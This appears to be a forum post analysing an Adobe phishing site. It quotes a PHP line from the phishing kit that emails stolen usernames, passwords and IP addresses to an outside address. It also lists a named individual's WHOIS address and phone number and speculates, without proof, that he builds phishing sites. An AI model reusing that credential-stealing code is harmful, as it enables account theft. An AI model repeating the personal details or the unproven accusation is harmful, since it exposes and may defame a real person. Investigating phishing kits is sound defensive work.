ADOBE Phishing

not a good attempt tbh, see here:

hxxp://www.algercomputersupport.com/DunlapTesting/wp-content/themes/pinboard/includes/PPDDF/

!!!Be careful: The site logs your IP address!!!

This is a weird thing. It does have a WHOIS record:
Name: Alex Alger
Street: 1001 E 1st Ave
City: Broomfield
State: CO
Postal Code: 80020
Country: US
Phone: +1 7123301363
Email: [email protected]

The website has his CV on it: http://algercomputersupport.com/Profile/AlexAlger_Resume.pdf
From how I understood the source code of the page, it will display a page with a pdf icon once you "logged in" and then redirect you to the real Adobe homepage.

I did a little digging around that site and found a “PPDDF.zip” file. Its a contained web site for Adobe account phishing and is dated 2 years after the online display folder was created. In the “111.php” in the zip files I found this:

</s><i> </i>mail("[email protected]","Email!","Latest Recieved Login! \n\nUser Name: $email\nPassword: $pword\nIp Address: $ip_address"); <e>

My guess is this Alex Alger was creating phishing websites for either his own use or was hired to make them. The strange long web address seems more like it was a display for the scammers.